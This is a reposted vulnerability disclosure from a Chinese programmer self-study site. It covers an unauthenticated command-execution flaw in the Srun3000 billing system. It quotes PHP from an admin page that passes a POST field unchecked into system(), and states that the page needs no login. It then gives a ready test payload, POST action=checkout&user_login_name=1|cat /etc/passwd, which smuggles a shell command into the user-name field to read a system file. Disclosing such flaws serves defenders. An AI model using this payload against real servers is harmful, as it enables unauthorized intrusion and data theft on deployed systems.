好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Srun3000计费系统命令执行漏洞 - 网站安全 - 自学

Srun3000计费系统命令执行 漏洞

/srun3/srun/web/admin/flux_stat/room.php  

<?php header("Content-type:text/ html ;charset=gb2312"); require("ipt_authd_conn.php"); require("functions/functions.php"); $debug=1; switch($_POST["action"])// { case "checkout": $user_login_name=$_POST["user_login_name"]; $group_id=$_POST["user_group_id"]; if($_POST["status"]==1) { system("super dropuser ".$user_login_name);//命令执行~ }

这个是用户页面里面的管理页面 不需要登录 没有验证权限 测试方法 x.com/admin/flux_room.php POST action=checkout&user_login_name=1|cat /etc/passwd

查看更多关于Srun3000计费系统命令执行漏洞 - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15530
  阅读:80次

上一篇: Struts1 ClassLoader 漏洞解决方案 - 网站

下一篇:联想Lenovo某crm的Portal管理界面注入 - 网站安全

相关资讯